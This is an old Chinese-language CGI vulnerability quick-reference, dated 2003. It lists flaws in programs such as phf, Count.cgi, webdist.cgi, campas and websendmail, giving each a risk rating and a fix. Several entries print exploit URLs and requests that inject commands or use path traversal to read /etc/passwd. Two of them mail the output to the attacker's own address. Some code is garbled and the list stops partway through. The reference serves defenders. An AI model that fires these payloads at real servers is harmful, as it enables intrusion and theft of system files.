?? cgi 安全漏洞資料速查.txt
字號:
CGI 安全漏洞資料速查
日期:2003年10月10日
類型:攻擊型
名字:phf
風(fēng)險(xiǎn)等級:中
描述:在 NCSA 或者 Apache(1.1.1版本以內(nèi))非商業(yè)版本的 WebServer 中
有一段程序 util.c,允許黑客以 root 身份執(zhí)行任何一個指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建議:無
解決方法:把 Apache Webserver 升級到 1.1.1 以上,或者將 NCSA Webserver
升級到最新版本
類型:攻擊型
名字:wguset.exe
風(fēng)險(xiǎn)等級:中
描述:如果您使用 NT 做為您的 WebServer 的操作系統(tǒng),而且 wguest.exe 存
在于您的 Web 可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬
盤上所有 USR_ 用戶能閱讀的文件
建議:將 wguset.exe 從你的 Web 目錄移走或刪除
解決方法:將 wguset.exe 從你的 Web 目錄移走或刪除
類型:攻擊型
名字:rguset.exe
風(fēng)險(xiǎn)等級:中
描述:如果您使用 NT 做為您的 WebServer 的操作系統(tǒng),而且 rguest.exe 存
在于您的 Web 可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬
盤上所有 USR_ 用戶能閱讀的文件
建議:將 rguset.exe 從你的 Web 目錄移走或刪除
解決方法:將 rguset.exe 從你的 Web 目錄移走或刪除
類型:攻擊型
名字:perl.exe
風(fēng)險(xiǎn)等級:低
描述:在cgi-bin 執(zhí)行目錄下存 在perl.exe,這屬于嚴(yán)重的配置錯誤。黑客
可以在 perl.exe 后面加一串指令,利用瀏覽器在 server 上執(zhí)行任何
腳本程序
建議:perl.exe 是放在任何帶執(zhí)行權(quán)限的 web 目錄下都是不安全的
解決方法:在 web 目錄下移除 perl.exe 這個程序.
類型:攻擊型
名字:shtml.exe
風(fēng)險(xiǎn)等級:低
描述:如果您使用 FrontPage 作為您的 WebServer,那么入侵者能夠利用
IUSR_ 用戶和 shtml.exe 入侵您的機(jī)器,做您不希望的事
建議:將 shtml.exe 從你的 Web 目錄移走或刪除
解決方法:將 shtml.exe 從你的 Web 目錄移走或刪除
類型:攻擊型
名字:wwwboard.pl
風(fēng)險(xiǎn)等級:低
描述:wwwboard.pl 程序容易引起攻擊者對服務(wù)器進(jìn)行 D.O.S 攻擊
建議:如無必要可以刪除該文件
解決方法:對 get_variables 的子程序中的下面這段:
if($FORM{\'followup\'}){$followup=\"1\";
@followup_num=split(/,/,$FORM{\'followup\'});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate=\"$FORM{\'origdate\'}\";
$origname=\"$FORM{\'origname\'}\";
$origsubject=\"$FORM{\'origsubject\'}\";}
替換為:
if($FORM{\'followup\'}){
$followup=\"1\";
@followup_num=split(/,/,$FORM{\'followup\'});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate=\"$FORM{\'origdate\'}\";
$origname=\"$FORM{\'origname\'}\";
$origsubject=\"$FORM{\'origsubject\'}\";
#WWWBoardBombPatch
#WrittenBy:SamuelSparlingsparling@slip.net)
$fn=0;
while($fn<$num_followups)
{
$cur_fup=@followups$fn];
$dfn=0;
foreach$fm(@followups)
{
if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
#EndWWWBoardBombPatch
}
類型:攻擊型
名字:uploader.exe
風(fēng)險(xiǎn)等級:中
描述:如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用
uploader.exe上傳任何文件
建議:將uploader.exe從你的Web目錄移走或刪除
解決方法:將uploader.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:bdir.htr
風(fēng)險(xiǎn)等級:高
描述:如果您使用NT做為您的WebServer的操作系統(tǒng),而且bdir.htr存在
于您的Web可執(zhí)行目錄中的話,入侵者將能利用它在您的服務(wù)器上
無止境的創(chuàng)建ODBC數(shù)據(jù)庫,并生成一些可執(zhí)行的文件。
建議:將bdir.htr從你的Web目錄移走或刪除
解決方法:將bdir.htr從你的Web目錄移走或刪除
類型:攻擊型
名字:Count.cgi
風(fēng)險(xiǎn)等級:高
描述:在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出
錯誤,允許入侵者無須登錄而遠(yuǎn)程執(zhí)行任何指令。
建議:如無必要可以刪除該文件
解決方法:將wwwcount升級到2.4或者以上
類型:攻擊型
名字:test-cgi
風(fēng)險(xiǎn)等級:高
描述:test-cgi這個文件可以被入侵者用來瀏覽服務(wù)器上的重要信息
建議:建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問權(quán)限
解決方法:刪除test-cgi文件
類型:攻擊型
名字:nph-test-cgi
風(fēng)險(xiǎn)等級:高
描述:nph-test-cgi這個文件可以被入侵者用來瀏覽服務(wù)器上的重要信息
建議:建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問權(quán)限
解決方法:刪除nph-test-cgi文件
類型:攻擊型
名字:php.cgi
風(fēng)險(xiǎn)等級:低
描述:php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導(dǎo)致任何系
統(tǒng)文件可以被入侵者讀取的漏洞
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除php.cgi程序是最好的辦法
類型:攻擊型
名字:handler
風(fēng)險(xiǎn)等級:低
描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在緩存溢出
錯誤,允許入侵者在server上遠(yuǎn)程執(zhí)行一段程序:
telnettarget.machine.com80
GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download
HTTP/1.0
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除handler文件
類型:攻擊型
名字:webgais
風(fēng)險(xiǎn)等級:高
描述:/cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個
毛病使入侵者可以繞過程序的安全機(jī)制,執(zhí)行系統(tǒng)命令:
POST/cgi-bin/webgaisHTTP/1.0
Content-length:85(replacethiswiththeactuallengthof
the\"exploit\"line)
telnettarget.machine.com80query=\';mail+you\\@your.host
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除webgais文件
類型:攻擊型
名字:websendmail
風(fēng)險(xiǎn)等級:高
描述:/cgin-bin目錄下的websendmail程序允許入侵者執(zhí)行一個系統(tǒng)指令:
telnettarget.machine.com80
POST/cgi-bin/websendmailHTTP/1.0
Content-length:xxx(shouldbereplacedwiththeactual
lengthofthestringpassedtotheserver,inthiscase
xxx=90) receiver=;mail+your_address\\@somewhere.org
&content=a
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:高級用戶:編輯websendmail腳本,過濾特殊字符
一般用戶:刪除websendmail文件
類型:攻擊型
名字:webdist.cgi
風(fēng)險(xiǎn)等級:高
描述:對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點(diǎn)
允許入侵者無須登錄而在系統(tǒng)上執(zhí)行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi
類型:攻擊型
名字:faxsurvey
風(fēng)險(xiǎn)等級:高
描述:在LinuxS.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無
須登錄就能在服務(wù)器執(zhí)行指令:http://joepc.linux.elsewhere.org/
cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/faxsurvey文件
類型:攻擊型
名字:htmlscript
風(fēng)險(xiǎn)等級:中
描述:安裝了htmlscript2.99x或者更早版本的服務(wù)器,存在一個毛病使
入侵者可以查看服務(wù)器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../
../../etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到
3.0以上
類型:攻擊型
名字:pfdisplay
風(fēng)險(xiǎn)等級:中
描述:在Irix6.4或者更早版本的web服務(wù)器上,/cgi-bin/pfdisplay程序
允許入侵者非法查看服務(wù)器上的文件
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/pfdisplay文件,或者打補(bǔ)丁,補(bǔ)丁可以去
sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下載:
Filename:README.patch.3018
Algorithm#1(sum-r):3795511README.patch.3018
Algorithm#2(sum):1545511README.patch.3018
MD5checksum:1169EB51D75E0794C64C2C1FD6211B69
Filename:patchSG0003018
Algorithm#1(sum-r):016792patchSG0003018
Algorithm#2(sum):128762patchSG0003018
MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8
Filename:patchSG0003018.idb
Algorithm#1(sum-r):013392patchSG0003018.idb
Algorithm#2(sum):2512patchSG0003018.idb
MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename:patchSG0003018.performer_tools_man
Algorithm#1(sum-r):102018patchSG0003018.per-
-former_tools_man
Algorithm#2(sum):31448patchSG0003018.performer_t-
-ools_man
MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename:patchSG0003018.performer_tools_sw
Algorithm#1(sum-r):4847418patchSG0003018.perform-
-er_tools_sw
Algorithm#2(sum):2817618patchSG0003018.performer_
tools_sw
MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F
類型:攻擊型
名字:www-sql
風(fēng)險(xiǎn)等級:中
描述:www-sql存在于/cgi-bin/目錄下,這將導(dǎo)致入侵可以越權(quán)訪問被保
護(hù)的文件
建議:最好刪除www-sql文件
解決方法:#ifPHPFASTCGI
while(FCGI_Accept()>=0)
{
#endif
s=getenv(\"REDIRECT_STATUS\");
if(!s){
puts(\"Content-type:text/plain\\r\\n\\r\\nPHP/FIdetected
aninternalerror.Pleaseinformsa@hogia.netofwhat
youjustdid.\\n\");
exit(1);
}
s=getenv(\"PATH_TRANSLATED\");
類型:攻擊型
名字:view-source
風(fēng)險(xiǎn)等級:高
描述:在cgi-bin目錄下的view-source程序沒有對輸入進(jìn)行安全檢查,使
入侵者可以查看服務(wù)器上的任何文件
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的viewsource程序
類型:攻擊型
名字:campas
風(fēng)險(xiǎn)等級:高
描述:在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看
server上的重要文件:
telnetwww.xxxx.net80
Trying200.xx.xx.xx...
Connectedtovenus.xxxx.net
Escapecharacteris\'^]\'.
GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的campas程序
類型:攻擊型
名字:aglimpse
風(fēng)險(xiǎn)等級:高
描述:在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登
錄而隨意執(zhí)行任何指令
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的aglimpse程序
類型:攻擊型
名字:AT-admin.cgi
風(fēng)險(xiǎn)等級:中
描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允
許普通用戶完全控制整個系統(tǒng)
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的AT-admin.cgi程序
類型:攻擊型
名字:finger
風(fēng)險(xiǎn)等級:中
描述:這個位于/cgi-bin下的finger程序,可以查看其它服務(wù)器的信息,
但是如果將參數(shù)改成本機(jī),本機(jī)上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的finger程序
類型:攻擊型
名字:webwho.pl
風(fēng)險(xiǎn)等級:中
描述:如果在您的Web可執(zhí)行目錄中有webwho.pl這個CGI腳本,那么入侵
者將能利用他閱讀啟動Web的用戶能讀寫執(zhí)行的任何文件。
建議:將webwho.pl從您的Web目錄中刪除或移走
解決方法:將webwho.pl從您的Web目錄中刪除或移走
類型:攻擊型
名字:w3-msql
風(fēng)險(xiǎn)等級:低
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -